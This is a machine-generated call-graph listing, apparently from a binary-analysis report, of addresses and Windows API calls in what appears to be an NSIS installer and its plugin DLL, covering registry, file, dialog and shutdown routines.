4509->4510 4513 401880 4510->4513 4511 404f48 25 API calls 4519 401862 4511->4519 4512 405d2f lstrcpynA 4512->4525 4514 402e9f 32 API calls 4513->4514 4515 401893 4514->4515 4516 4018a7 SetFileTime 4515->4516 4518 4018b9 CloseHandle 4515->4518 4516->4518 4517 405d51 18 API calls 4517->4525 4518->4519 4520 4018ca 4518->4520 4521 4018e2 4520->4521 4522 4018cf 4520->4522 4524 405d51 18 API calls 4521->4524 4523 405d51 18 API calls 4522->4523 4526 4018d7 lstrcatA 4523->4526 4527 4018ea 4524->4527 4525->4504 4525->4505 4525->4508 4525->4509 4525->4512 4525->4517 4528 405525 MessageBoxIndirectA 4525->4528 4530 40184d 4525->4530 4531 4059a2 GetFileAttributesA CreateFileA 4525->4531 4526->4527 4527->4519 4529 405525 MessageBoxIndirectA 4527->4529 4528->4525 4529->4519 4530->4511 4530->4519 4531->4525 4532->4500 4533->4499 4757 401651 4758 402a3a 18 API calls 4757->4758 4759 401657 4758->4759 4760 406033 2 API calls 4759->4760 4761 40165d 4760->4761 4762 401951 4763 402a1d 18 API calls 4762->4763 4764 401958 4763->4764 4765 402a1d 18 API calls 4764->4765 4766 401962 4765->4766 4767 402a3a 18 API calls 4766->4767 4768 40196b 4767->4768 4769 40197e lstrlenA 4768->4769 4770 4019b9 4768->4770 4771 401988 4769->4771 4771->4770 4775 405d2f lstrcpynA 4771->4775 4773 4019a2 4773->4770 4774 4019af lstrlenA 4773->4774 4774->4770 4775->4773 4534 4021d2 4535 402a3a 18 API calls 4534->4535 4536 4021d8 4535->4536 4537 402a3a 18 API calls 4536->4537 4538 4021e1 4537->4538 4539 402a3a 18 API calls 4538->4539 4540 4021ea 4539->4540 4541 406033 2 API calls 4540->4541 4542 4021f3 4541->4542 4543 402204 lstrlenA lstrlenA 4542->4543 4544 4021f7 4542->4544 4546 404f48 25 API calls 4543->4546 4545 404f48 25 API calls 4544->4545 4548 4021ff 4544->4548 4545->4548 4547 402240 SHFileOperationA 4546->4547 4547->4544 4547->4548 4776 404352 4777 40437e 4776->4777 4778 40438f 4776->4778 4837 405509 GetDlgItemTextA 4777->4837 4779 40439b GetDlgItem 4778->4779 4786 4043fa 4778->4786 4781 4043af 4779->4781 4785 4043c3 SetWindowTextA 4781->4785 4790 40583a 4 API calls 4781->4790 4782 4044de 4787 404688 4782->4787 4839 405509 GetDlgItemTextA 4782->4839 4783 404389 4784 405f9a 5 API calls 4783->4784 4784->4778 4791 403f14 19 API calls 4785->4791 4786->4782 4786->4787 4792 405d51 18 API calls 4786->4792 4789 403f7b 8 API calls 4787->4789 4794 40469c 4789->4794 4795 4043b9 4790->4795 4796 4043df 4791->4796 4797 40446e SHBrowseForFolderA 4792->4797 4793 40450e 4798 40588f 18 API calls 4793->4798 4795->4785 4802 4057a1 3 API calls 4795->4802 4799 403f14 19 API calls 4796->4799 4797->4782 4800 404486 CoTaskMemFree 4797->4800 4801 404514 4798->4801 4803 4043ed 4799->4803 4804 4057a1 3 API calls 4800->4804 4840 405d2f lstrcpynA 4801->4840 4802->4785 4838 403f49 SendMessageA 4803->4838 4806 404493 4804->4806 4809 4044ca SetDlgItemTextA 4806->4809 4813 405d51 18 API calls 4806->4813 4808 4043f3 4812 4060c8 5 API calls 4808->4812 4809->4782 4810 40452b 4811 4060c8 5 API calls 4810->4811 4819 404532 4811->4819 4812->4786 4814 4044b2 lstrcmpiA 4813->4814 4814->4809 4816 4044c3 lstrcatA 4814->4816 4815 40456e 4841 405d2f lstrcpynA 4815->4841 4816->4809 4818 404575 4820 40583a 4 API calls 4818->4820 4819->4815 4824 4057e8 2 API calls 4819->4824 4825 4045c6 4819->4825 4821 40457b GetDiskFreeSpaceA 4820->4821 4823 40459f MulDiv 4821->4823 4821->4825 4823->4825 4824->4819 4826 404637 4825->4826 4828 4047ce 21 API calls 4825->4828 4827 40465a 4826->4827 4829 40140b 2 API calls 4826->4829 4842 403f36 KiUserCallbackDispatcher 4827->4842 4830 404624 4828->4830 4829->4827 4831 404639 SetDlgItemTextA 4830->4831 4832 404629 4830->4832 4831->4826 4834 404709 21 API calls 4832->4834 4834->4826 4835 404676 4835->4787 4843 4042e7 4835->4843 4837->4783 4838->4808 4839->4793 4840->4810 4841->4818 4842->4835 4844 4042f5 4843->4844 4845 4042fa SendMessageA 4843->4845 4844->4845 4845->4787 4846 4019d2 4847 402a3a 18 API calls 4846->4847 4848 4019d9 4847->4848 4849 402a3a 18 API calls 4848->4849 4850 4019e2 4849->4850 4851 4019e9 lstrcmpiA 4850->4851 4852 4019fb lstrcmpA 4850->4852 4853 4019ef 4851->4853 4852->4853 4854 4014d6 4855 402a1d 18 API calls 4854->4855 4856 4014dc Sleep 4855->4856 4858 4028cf 4856->4858 4859 1000161a 4860 10001649 4859->4860 4861 10001a5d 18 API calls 4860->4861 4862 10001650 4861->4862 4863 10001663 4862->4863 4864 10001657 4862->4864 4866 1000168a 4863->4866 4867 1000166d 4863->4867 4865 10001266 2 API calls 4864->4865 4870 10001661 4865->4870 4868 10001690 4866->4868 4869 100016b4 4866->4869 4871 100014e2 3 API calls 4867->4871 4872 10001559 3 API calls 4868->4872 4873 100014e2 3 API calls 4869->4873 4874 10001672 4871->4874 4875 10001695 4872->4875 4873->4870 4876 10001559 3 API calls 4874->4876 4877 10001266 2 API calls 4875->4877 4878 10001678 4876->4878 4879 1000169b GlobalFree 4877->4879 4880 10001266 2 API calls 4878->4880 4879->4870 4882 100016af GlobalFree 4879->4882 4881 1000167e GlobalFree 4880->4881 4881->4870 4882->4870 4883 40155b 4884 401577 ShowWindow 4883->4884 4885 40157e 4883->4885 4884->4885 4886 40158c ShowWindow 4885->4886 4887 4028cf 4885->4887 4886->4887 4578 40255c 4579 402a1d 18 API calls 4578->4579 4584 402566 4579->4584 4580 4025d0 4581 405a1a ReadFile 4581->4584 4582 4025d2 4587 405c8d wsprintfA 4582->4587 4583 4025e2 4583->4580 4586 4025f8 SetFilePointer 4583->4586 4584->4580 4584->4581 4584->4582 4584->4583 4586->4580 4587->4580 4888 40405d 4889 404073 4888->4889 4890 40417f 4888->4890 4893 403f14 19 API calls 4889->4893 4891 4041ee 4890->4891 4896 4042c2 4890->4896 4900 4041c3 GetDlgItem SendMessageA 4890->4900 4892 4041f8 GetDlgItem 4891->4892 4891->4896 4895 40420e 4892->4895 4899 404280 4892->4899 4894 4040c9 4893->4894 4898 403f14 19 API calls 4894->4898 4895->4899 4903 404234 6 API calls 4895->4903 4897 403f7b 8 API calls 4896->4897 4901 4042bd 4897->4901 4902 4040d6 CheckDlgButton 4898->4902 4899->4896 4904 404292 4899->4904 4919 403f36 KiUserCallbackDispatcher 4900->4919 4917 403f36 KiUserCallbackDispatcher 4902->4917 4903->4899 4907 404298 SendMessageA 4904->4907 4908 4042a9 4904->4908 4907->4908 4908->4901 4912 4042af SendMessageA 4908->4912 4909 4041e9 4910 4042e7 SendMessageA 4909->4910 4910->4891 4911 4040f4 GetDlgItem 4918 403f49 SendMessageA 4911->4918 4912->4901 4914 40410a SendMessageA 4915 404131 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4914->4915 4916 404128 GetSysColor 4914->4916 4915->4901 4916->4915 4917->4911 4918->4914 4919->4909 4920 40205e 4921 402a3a 18 API calls 4920->4921 4922 402065 4921->4922 4923 402a3a 18 API calls 4922->4923 4924 40206f 4923->4924 4925 402a3a 18 API calls 4924->4925 4926 402079 4925->4926 4927 402a3a 18 API calls 4926->4927 4928 402083 4927->4928 4929 402a3a 18 API calls 4928->4929 4930 40208d 4929->4930 4931 4020cc CoCreateInstance 4930->4931 4932 402a3a 18 API calls 4930->4932 4935 4020eb 4931->4935 4937 402193 4931->4937 4932->4931 4933 401423 25 API calls 4934 4021c9 4933->4934 4936 402173 MultiByteToWideChar 4935->4936 4935->4937 4936->4937 4937->4933 4937->4934 4938 40265e 4939 402664 4938->4939 4940 402668 FindNextFileA 4939->4940 4943 40267a 4939->4943 4941 4026b9 4940->4941 4940->4943 4944 405d2f lstrcpynA 4941->4944 4944->4943 4945 401cde GetDlgItem GetClientRect 4946 402a3a 18 API calls 4945->4946 4947 401d0e LoadImageA SendMessageA 4946->4947 4948 401d2c DeleteObject 4947->4948 4949 4028cf 4947->4949 4948->4949 4950 401662 4951 402a3a 18 API calls 4950->4951 4952 401669 4951->4952 4953 402a3a 18 API calls 4952->4953 4954 401672 4953->4954 4955 402a3a 18 API calls 4954->4955 4956 40167b MoveFileA 4955->4956 4957 40168e 4956->4957 4963 401687 4956->4963 4959 406033 2 API calls 4957->4959 4961 4021c9 4957->4961 4958 401423 25 API calls 4958->4961 4960 40169d 4959->4960 4960->4961 4962 405bea 38 API calls 4960->4962 4962->4963 4963->4958 3781 402364 3782 40236a 3781->3782 3783 402a3a 18 API calls 3782->3783 3784 40237c 3783->3784 3785 402a3a 18 API calls 3784->3785 3786 402386 RegCreateKeyExA 3785->3786 3787 4026a6 3786->3787 3789 4023b0 3786->3789 3788 4023c8 3791 4023d4 3788->3791 3798 402a1d 3788->3798 3789->3788 3790 402a3a 18 API calls 3789->3790 3792 4023c1 lstrlenA 3790->3792 3794 4023ef RegSetValueExA 3791->3794 3801 402e9f 3791->3801 3792->3788 3796 402405 RegCloseKey 3794->3796 3796->3787 3799 405d51 18 API calls 3798->3799 3800 402a31 3799->3800 3800->3791 3803 402eb5 3801->3803 3802 402ee3 3821 4030b1 3802->3821 3803->3802 3826 4030c7 SetFilePointer 3803->3826 3807 402f00 GetTickCount 3810 403034 3807->3810 3817 402f4f 3807->3817 3808 40304a 3809 40308c 3808->3809 3814 40304e 3808->3814 3811 4030b1 ReadFile 3809->3811 3810->3794 3811->3810 3812 4030b1 ReadFile 3812->3817 3813 4030b1 ReadFile 3813->3814 3814->3810 3814->3813 3815 405a49 WriteFile 3814->3815 3815->3814 3816 402fa5 GetTickCount 3816->3817 3817->3810 3817->3812 3817->3816 3818 402fca MulDiv wsprintfA 3817->3818 3824 405a49 WriteFile 3817->3824 3819 404f48 25 API calls 3818->3819 3819->3817 3827 405a1a ReadFile 3821->3827 3825 405a67 3824->3825 3825->3817 3826->3802 3828 402eee 3827->3828 3828->3807 3828->3808 3828->3810 4964 401dea 4965 402a3a 18 API calls 4964->4965 4966 401df0 4965->4966 4967 402a3a 18 API calls 4966->4967 4968 401df9 4967->4968 4969 402a3a 18 API calls 4968->4969 4970 401e02 4969->4970 4971 402a3a 18 API calls 4970->4971 4972 401e0b 4971->4972 4973 401423 25 API calls 4972->4973 4974 401e12 ShellExecuteA 4973->4974 4975 401e3f 4974->4975 4976 40366d 4977 403678 4976->4977 4978 40367c 4977->4978 4979 40367f GlobalAlloc 4977->4979 4979->4978 4980 401eee 4981 402a3a 18 API calls 4980->4981 4982 401ef5 4981->4982 4983 4060c8 5 API calls 4982->4983 4984 401f04 4983->4984 4985 401f1c GlobalAlloc 4984->4985 4986 401f84 4984->4986 4985->4986 4987 401f30 4985->4987 4988 4060c8 5 API calls 4987->4988 4989 401f37 4988->4989 4990 4060c8 5 API calls 4989->4990 4991 401f41 4990->4991 4991->4986 4995 405c8d wsprintfA 4991->4995 4993 401f78 4996 405c8d wsprintfA 4993->4996 4995->4993 4996->4986 4997 4014f0 SetForegroundWindow 4998 4028cf 4997->4998 4999 100015b3 5000 100014bb GlobalFree 4999->5000 5002 100015cb 5000->5002 5001 10001611 GlobalFree 5002->5001 5003 100015e6 5002->5003 5004 100015fd VirtualFree 5002->5004 5003->5001 5004->5001 5010 4018f5 5011 40192c 5010->5011 5012 402a3a 18 API calls 5011->5012 5013 401931 5012->5013 5014 4055d1 69 API calls 5013->5014 5015 40193a 5014->5015 5016 4024f7 5017 402a3a 18 API calls 5016->5017 5018 4024fe 5017->5018 5021 4059a2 GetFileAttributesA CreateFileA 5018->5021 5020 40250a 5021->5020 5022 4018f8 5023 402a3a 18 API calls 5022->5023 5024 4018ff 5023->5024 5025 405525 MessageBoxIndirectA 5024->5025 5026 401908 5025->5026 5027 1000103d 5028 1000101b 5 API calls 5027->5028 5029 10001056 5028->5029 5030 4014fe 5031 401506 5030->5031 5033 401519 5030->5033 5032 402a1d 18 API calls 5031->5032 5032->5033 5034 402b7f 5035 402ba7 5034->5035 5036 402b8e SetTimer 5034->5036 5037 402bfc 5035->5037 5038 402bc1 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5035->5038 5036->5035 5038->5037 5039 401000 5040 401037 BeginPaint GetClientRect 5039->5040 5041 40100c DefWindowProcA 5039->5041 5042 4010f3 5040->5042 5044 401179 5041->5044 5045 401073 CreateBrushIndirect FillRect DeleteObject 5042->5045 5046 4010fc 5042->5046 5045->5042 5047 401102 CreateFontIndirectA 5046->5047 5048 401167 EndPaint 5046->5048 5047->5048 5049 401112 6 API calls 5047->5049 5048->5044 5049->5048 5050 402482 5051 402b44 19 API calls 5050->5051 5052 40248c 5051->5052 5053 402a1d 18 API calls 5052->5053 5054 402495 5053->5054 5055 4024b8 RegEnumValueA 5054->5055 5056 4024ac RegEnumKeyA 5054->5056 5058 4026a6 5054->5058 5057 4024d1 RegCloseKey 5055->5057 5055->5058 5056->5057 5057->5058 5060 401b02 5061 402a3a 18 API calls 5060->5061 5062 401b09 5061->5062 5063 402a1d 18 API calls 5062->5063 5064 401b12 wsprintfA 5063->5064 5065 4028cf 5064->5065 5066 401a03 5067 402a3a 18 API calls 5066->5067 5068 401a0c ExpandEnvironmentStringsA 5067->5068 5069 401a20 5068->5069 5071 401a33 5068->5071 5070 401a25 lstrcmpA 5069->5070 5069->5071 5070->5071 5072 402283 5073 402291 5072->5073 5074 40228b 5072->5074 5076 4022a1 5073->5076 5077 402a3a 18 API calls 5073->5077 5075 402a3a 18 API calls 5074->5075 5075->5073 5078 4022af 5076->5078 5079 402a3a 18 API calls 5076->5079 5077->5076 5080 402a3a 18 API calls 5078->5080 5079->5078 5081 4022b8 WritePrivateProfileStringA 5080->5081 5082 100029c3 5083 100029db 5082->5083 5084 10001534 2 API calls 5083->5084 5085 100029f6 5084->5085 3829 405086 3830 405231 3829->3830 3831 4050a8 GetDlgItem GetDlgItem GetDlgItem 3829->3831 3833 405261 3830->3833 3834 405239 GetDlgItem CreateThread CloseHandle 3830->3834 3875 403f49 SendMessageA 3831->3875 3836 40528f 3833->3836 3837 4052b0 3833->3837 3838 405277 ShowWindow ShowWindow 3833->3838 3834->3833 3878 40501a OleInitialize 3834->3878 3835 405118 3841 40511f GetClientRect GetSystemMetrics SendMessageA SendMessageA 3835->3841 3839 405297 3836->3839 3840 4052ea 3836->3840 3845 403f7b 8 API calls 3837->3845 3877 403f49 SendMessageA 3838->3877 3843 4052c3 ShowWindow 3839->3843 3844 40529f 3839->3844 3840->3837 3850 4052f7 SendMessageA 3840->3850 3848 405171 SendMessageA SendMessageA 3841->3848 3849 40518d 3841->3849 3846 4052e3 3843->3846 3847 4052d5 3843->3847 3851 403eed SendMessageA 3844->3851 3852 4052bc 3845->3852 3854 403eed SendMessageA 3846->3854 3853 404f48 25 API calls 3847->3853 3848->3849 3855 4051a0 3849->3855 3856 405192 SendMessageA 3849->3856 3850->3852 3857 405310 CreatePopupMenu 3850->3857 3851->3837 3853->3846 3854->3840 3859 403f14 19 API calls 3855->3859 3856->3855 3858 405d51 18 API calls 3857->3858 3860 405320 AppendMenuA 3858->3860 3861 4051b0 3859->3861 3862 405351 TrackPopupMenu 3860->3862 3863 40533e GetWindowRect 3860->3863 3864 4051b9 ShowWindow 3861->3864 3865 4051ed GetDlgItem SendMessageA 3861->3865 3862->3852 3867 40536d 3862->3867 3863->3862 3868 4051dc 3864->3868 3869 4051cf ShowWindow 3864->3869 3865->3852 3866 405214 SendMessageA SendMessageA 3865->3866 3866->3852 3870 40538c SendMessageA 3867->3870 3876 403f49 SendMessageA 3868->3876 3869->3868 3870->3870 3872 4053a9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3870->3872 3873 4053cb SendMessageA 3872->3873 3873->3873 3874 4053ed GlobalUnlock SetClipboardData CloseClipboard 3873->3874 3874->3852 3875->3835 3876->3865 3877->3836 3879 403f60 SendMessageA 3878->3879 3880 40503d 3879->3880 3883 401389 2 API calls 3880->3883 3884 405064 3880->3884 3881 403f60 SendMessageA 3882 405076 OleUninitialize 3881->3882 3883->3880 3884->3881 3885 402308 3886 402338 3885->3886 3887 40230d 3885->3887 3888 402a3a 18 API calls 3886->3888 3898 402b44 3887->3898 3891 40233f 3888->3891 3890 402314 3892 40231e 3890->3892 3897 402357 3890->3897 3902 402a7a RegOpenKeyExA 3891->3902 3893 402a3a 18 API calls 3892->3893 3894 402325 RegDeleteValueA RegCloseKey 3893->3894 3894->3897 3899 402a3a 18 API calls 3898->3899 3900 402b5d 3899->3900 3901 402b6b RegOpenKeyExA 3900->3901 3901->3890 3909 402355 3902->3909 3910 402aa5 3902->3910 3903 402acb RegEnumKeyA 3904 402add RegCloseKey 3903->3904 3903->3910 3912 4060c8 GetModuleHandleA 3904->3912 3905 402b02 RegCloseKey 3905->3909 3907 402a7a 5 API calls 3907->3910 3909->3897 3910->3903 3910->3904 3910->3905 3910->3907 3911 402b1d RegDeleteKeyA 3911->3909 3913 4060e4 3912->3913 3914 4060ee GetProcAddress 3912->3914 3918 40605a GetSystemDirectoryA 3913->3918 3916 402aed 3914->3916 3916->3909 3916->3911 3917 4060ea 3917->3914 3917->3916 3919 40607c wsprintfA LoadLibraryExA 3918->3919 3919->3917 5086 402688 5087 402a3a 18 API calls 5086->5087 5088 40268f FindFirstFileA 5087->5088 5089 4026b2 5088->5089 5092 4026a2 5088->5092 5090 4026b9 5089->5090 5094 405c8d wsprintfA 5089->5094 5095 405d2f lstrcpynA 5090->5095 5094->5090 5095->5092 5096 401c8a 5097 402a1d 18 API calls 5096->5097 5098 401c90 IsWindow 5097->5098 5099 4019f3 5098->5099 5100 40430b 5101 404341 5100->5101 5102 40431b 5100->5102 5104 403f7b 8 API calls 5101->5104 5103 403f14 19 API calls 5102->5103 5105 404328 SetDlgItemTextA 5103->5105 5106 40434d 5104->5106 5105->5101 4052 40310f SetErrorMode GetVersion 4053 403146 4052->4053 4054 40314c 4052->4054 4055 4060c8 5 API calls 4053->4055 4056 40605a 3 API calls 4054->4056 4055->4054 4057 403162 lstrlenA 4056->4057 4057->4054 4058 403171 4057->4058 4059 4060c8 5 API calls 4058->4059 4060 403179 4059->4060 4061 4060c8 5 API calls 4060->4061 4062 403180 #17 OleInitialize SHGetFileInfoA 4061->4062 4140 405d2f lstrcpynA 4062->4140 4064 4031bd GetCommandLineA 4141 405d2f lstrcpynA 4064->4141 4066 4031cf GetModuleHandleA 4067 4031e6 4066->4067 4068 4057cc CharNextA 4067->4068 4069 4031fa CharNextA 4068->4069 4077 40320a 4069->4077 4070 4032d4 4071 4032e7 GetTempPathA 4070->4071 4142 4030de 4071->4142 4073 4032ff 4074 403303 GetWindowsDirectoryA lstrcatA 4073->4074 4075 403359 DeleteFileA 4073->4075 4078 4030de 12 API calls 4074->4078 4152 402c66 GetTickCount GetModuleFileNameA 4075->4152 4076 4057cc CharNextA 4076->4077 4077->4070 4077->4076 4081 4032d6 4077->4081 4080 40331f 4078->4080 4080->4075 4084 403323 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4080->4084 4236 405d2f lstrcpynA 4081->4236 4082 40336d 4087 4033f3 4082->4087 4088 4057cc CharNextA 4082->4088 4136 403403 4082->4136 4086 4030de 12 API calls 4084->4086 4090 403351 4086->4090 4180 4036af 4087->4180 4092 403388 4088->4092 4090->4075 4090->4136 4099 403433 4092->4099 4100 4033ce 4092->4100 4093 40353b 4096 403543 GetCurrentProcess OpenProcessToken 4093->4096 4097 4035bd ExitProcess 4093->4097 4094 40341d 4246 405525 4094->4246 4102 40358e 4096->4102 4103 40355e LookupPrivilegeValueA AdjustTokenPrivileges 4096->4103 4250 4054a8 4099->4250 4104 40588f 18 API calls 4100->4104 4106 4060c8 5 API calls 4102->4106 4103->4102 4107 4033d9 4104->4107 4109 403595 4106->4109 4107->4136 4237 405d2f lstrcpynA 4107->4237 4112 4035aa ExitWindowsEx 4109->4112 4113 4035b6 4109->4113 4110 403454 lstrcatA lstrcmpiA 4115 403470 4110->4115 4110->4136 4111 403449 lstrcatA 4111->4110 4112->4097 4112->4113 4116 40140b 2 API calls 4113->4116 4118 403475 4115->4118 4119 40347c 4115->4119 4116->4097 4117 4033e8 4238 405d2f lstrcpynA 4117->4238 4253 40540e CreateDirectoryA 4118->4253 4258 40548b CreateDirectoryA 4119->4258 4123 403481 SetCurrentDirectoryA 4125 403490 4123->4125 4126 40349b 4123->4126 4261 405d2f lstrcpynA 4125->4261 4262 405d2f lstrcpynA 4126->4262 4129 4034a9 4130 405d51 18 API calls 4129->4130 4133 40352f 4129->4133 4135 405bea 38 API calls 4129->4135 4137 405d51 18 API calls 4129->4137 4138 4054c0 2 API calls 4129->4138 4139 40351b CloseHandle 4129->4139 4131 4034da DeleteFileA 4130->4131 4131->4129 4132 4034e7 CopyFileA 4131->4132 4132->4129 4134 405bea 38 API calls 4133->4134 4134->4136 4135->4129 4239 4035d5 4136->4239 4137->4129 4138->4129 4139->4129 4140->4064 4141->4066 4143 405f9a 5 API calls 4142->4143 4144 4030ea 4143->4144 4145 4030f4 4144->4145 4146 4057a1 3 API calls 4144->4146 4145->4073 4147 4030fc 4146->4147 4148 40548b 2 API calls 4147->4148 4149 403102 4148->4149 4263 4059d1 4149->4263 4267 4059a2 GetFileAttributesA CreateFileA 4152->4267 4154 402ca6 4175 402cb6 4154->4175 4268 405d2f lstrcpynA 4154->4268 4156 402ccc 4157 4057e8 2 API calls 4156->4157 4158 402cd2 4157->4158 4269 405d2f lstrcpynA 4158->4269 4160 402cdd GetFileSize 4161 402cf4 4160->4161 4162 402dd9 4160->4162 4161->4162 4165 4030b1 ReadFile 4161->4165 4167 402e45 4161->4167 4161->4175 4176 402c02 6 API calls 4161->4176 4270 402c02 4162->4270 4164 402de2 4166 402e12 GlobalAlloc 4164->4166 4164->4175 4282 4030c7 SetFilePointer 4164->4282 4165->4161 4281 4030c7 SetFilePointer 4166->4281 4171 402c02 6 API calls 4167->4171 4170 402e2d 4174 402e9f 32 API calls 4170->4174 4171->4175 4172 402dfb 4173 4030b1 ReadFile 4172->4173 4177 402e06 4173->4177 4178 402e39 4174->4178 4175->4082 4176->4161 4177->4166 4177->4175 4178->4175 4179 402e76 SetFilePointer 4178->4179 4179->4175 4181 4060c8 5 API calls 4180->4181 4182 4036c3 4181->4182 4183 4036c9 4182->4183 4184 4036db 4182->4184 4292 405c8d wsprintfA 4183->4292 4185 405c16 3 API calls 4184->4185 4186 403706 4185->4186 4187 403724 lstrcatA 4186->4187 4189 405c16 3 API calls 4186->4189 4190 4036d9 4187->4190 4189->4187 4283 403974 4190->4283 4193 40588f 18 API calls 4194 403756 4193->4194 4195 4037df 4194->4195 4197 405c16 3 API calls 4194->4197 4196 40588f 18 API calls 4195->4196 4198 4037e5 4196->4198 4199 403782 4197->4199 4200 4037f5 LoadImageA 4198->4200 4203 405d51 18 API calls 4198->4203 4199->4195 4206 40379e lstrlenA 4199->4206 4209 4057cc CharNextA 4199->4209 4201 40389b 4200->4201 4202 40381c RegisterClassA 4200->4202 4205 40140b 2 API calls 4201->4205 4204 403852 SystemParametersInfoA CreateWindowExA 4202->4204 4235 4038a5 4202->4235 4203->4200 4204->4201 4211 4038a1 4205->4211 4207 4037d2 4206->4207 4208 4037ac lstrcmpiA 4206->4208 4212 4057a1 3 API calls 4207->4212 4208->4207 4210 4037bc GetFileAttributesA 4208->4210 4213 40379c 4209->4213 4214 4037c8 4210->4214 4215 403974 19 API calls 4211->4215 4211->4235 4216 4037d8 4212->4216 4213->4206 4214->4207 4217 4057e8 2 API calls 4214->4217 4218 4038b2 4215->4218 4293 405d2f lstrcpynA 4216->4293 4217->4207 4220 403941 4218->4220 4221 4038be ShowWindow 4218->4221 4222 40501a 5 API calls 4220->4222 4223 40605a 3 API calls 4221->4223 4224 403947 4222->4224 4225 4038d6 4223->4225 4226 403963 4224->4226 4227 40394b 4224->4227 4228 4038e4 GetClassInfoA 4225->4228 4230 40605a 3 API calls 4225->4230 4229 40140b 2 API calls 4226->4229 4234 40140b 2 API calls 4227->4234 4227->4235 4231 4038f8 GetClassInfoA RegisterClassA 4228->4231 4232 40390e DialogBoxParamA 4228->4232 4229->4235 4230->4228 4231->4232 4233 40140b 2 API calls 4232->4233 4233->4235 4234->4235 4235->4136 4236->4071 4237->4117 4238->4087 4240 4035ed 4239->4240 4241 4035df CloseHandle 4239->4241 4295 40361a 4240->4295 4241->4240 4244 4055d1 69 API calls 4245 40340c OleUninitialize 4244->4245 4245->4093 4245->4094 4248 40553a 4246->4248 4247 40342b ExitProcess 4248->4247 4249 40554e MessageBoxIndirectA 4248->4249 4249->4247 4251 4060c8 5 API calls 4250->4251 4252 403438 lstrcatA 4251->4252 4252->4110 4252->4111 4254 40347a 4253->4254 4255 40545f GetLastError 4253->4255 4254->4123 4255->4254 4256 40546e SetFileSecurityA 4255->4256 4256->4254 4257 405484 GetLastError 4256->4257 4257->4254 4259 40549b 4258->4259 4260 40549f GetLastError 4258->4260 4259->4123 4260->4259 4261->4126 4262->4129 4264 4059dc GetTickCount GetTempFileNameA 4263->4264 4265 40310d 4264->4265 4266 405a09 4264->4266 4265->4073 4266->4264 4266->4265 4267->4154 4268->4156 4269->4160 4271 402c23 4270->4271 4272 402c0b 4270->4272 4275 402c33 GetTickCount 4271->4275 4276 402c2b 4271->4276 4273 402c14 DestroyWindow 4272->4273 4274 402c1b 4272->4274 4273->4274 4274->4164 4277 402c41 CreateDialogParamA ShowWindow 4275->4277 4278 402c64 4275->4278 4279 406104 2 API calls 4276->4279 4277->4278 4278->4164 4280 402c31 4279->4280 4280->4164 4281->4170 4282->4172 4284 403988 4283->4284 4294 405c8d wsprintfA 4284->4294 4286 4039f9 4287 405d51 18 API calls 4286->4287 4288 403a05 SetWindowTextA 4287->4288 4289 403734 4288->4289 4290 403a21 4288->4290 4289->4193 4290->4289 4291 405d51 18 API calls 4290->4291 4291->4290 4292->4190 4293->4195 4294->4286 4296 403628 4295->4296 4297 4035f2 4296->4297 4298 40362d FreeLibrary GlobalFree 4296->4298 4297->4244 4298->4297 4298->4298 4299 402410 4300 402b44 19 API calls 4299->4300 4301 40241a 4300->4301 4302 402a3a 18 API calls 4301->4302 4303 402423 4302->4303 4304 40242d RegQueryValueExA 4303->4304 4306 4026a6 4303->4306 4305 40244d 4304->4305 4309 402453 RegCloseKey 4304->4309 4305->4309 4310 405c8d wsprintfA 4305->4310 4309->4306 4310->4309 4311 401f90 4312 401fa2 4311->4312 4313 402050 4311->4313 4314 402a3a 18 API calls 4312->4314 4316 401423 25 API calls 4313->4316 4315 401fa9 4314->4315 4317 402a3a 18 API calls 4315->4317 4322 4021c9 4316->4322 4318 401fb2 4317->4318 4319 401fc7 LoadLibraryExA 4318->4319 4320 401fba GetModuleHandleA 4318->4320 4319->4313 4321 401fd7 GetProcAddress 4319->4321 4320->4319 4320->4321 4323 402023 4321->4323 4324 401fe6 4321->4324 4325 404f48 25 API calls 4323->4325 4326 402005 4324->4326 4327 401fee 4324->4327 4328 401ff6 4325->4328 4332 100016bd 4326->4332 4374 401423 4327->4374 4328->4322 4330 402044 FreeLibrary 4328->4330 4330->4322 4333 100016ed 4332->4333 4377 10001a5d 4333->4377 4335 100016f4 4336 1000180a 4335->4336 4337 10001705 4335->4337 4338 1000170c 4335->4338 4336->4328 4426 100021b0 4337->4426 4409 100021fa 4338->4409 4343 10001770 4349 100017b2 4343->4349 4350 10001776 4343->4350 4344 10001752 4439 100023da 4344->4439 4345 10001722 4348 10001728 4345->4348 4354 10001733 4345->4354 4346 1000173b 4359 10001731 4346->4359 4436 10002aa3 4346->4436 4348->4359 4420 100027e8 4348->4420 4352 100023da 11 API calls 4349->4352 4356 10001559 3 API calls 4350->4356 4357 100017a4 4352->4357 4353 10001758 4450 10001559 4353->4450 4430 10002589 4354->4430 4361 1000178c 4356->4361 4365 100017f9 4357->4365 4461 100023a0 4357->4461 4359->4343 4359->4344 4364 100023da 11 API calls 4361->4364 4363 10001739 4363->4359 4364->4357 4365->4336 4367 10001803 GlobalFree 4365->4367 4367->4336 4371 100017e5 4371->4365 4465 100014e2 wsprintfA 4371->4465 4372 100017de FreeLibrary 4372->4371 4375 404f48 25 API calls 4374->4375 4376 401431 4375->4376 4376->4328 4468 10001215 GlobalAlloc 4377->4468 4379 10001a81 4469 10001215 GlobalAlloc 4379->4469 4381 10001cbb GlobalFree GlobalFree GlobalFree 4382 10001cd8 4381->4382 4401 10001d22 4381->4401 4383 1000201a 4382->4383 4390 10001ced 4382->4390 4382->4401 4385 1000203c GetModuleHandleA 4383->4385 4383->4401 4384 10001b60 GlobalAlloc 4406 10001a8c 4384->4406 4388 10002062 4385->4388 4389 1000204d LoadLibraryA 4385->4389 4386 10001bab lstrcpyA 4391 10001bb5 lstrcpyA 4386->4391 4387 10001bc9 GlobalFree 4387->4406 4476 100015a4 GetProcAddress 4388->4476 4389->4388 4389->4401 4390->4401 4472 10001224 4390->4472 4391->4406 4393 100020b3 4395 100020c0 lstrlenA 4393->4395 4393->4401 4394 10001f7a 4400 10001fbe lstrcpyA 4394->4400 4394->4401 4477 100015a4 GetProcAddress 4395->4477 4397 10002074 4397->4393 4408 1000209d GetProcAddress 4397->4408 4400->4401 4401->4335 4402 10001c07 4402->4406 4470 10001534 GlobalSize GlobalAlloc 4402->4470 4403 10001e75 GlobalFree 4403->4406 4404 100020d9 4404->4401 4406->4381 4406->4384 4406->4386 4406->4387 4406->4391 4406->4394 4406->4401 4406->4402 4406->4403 4407 10001224 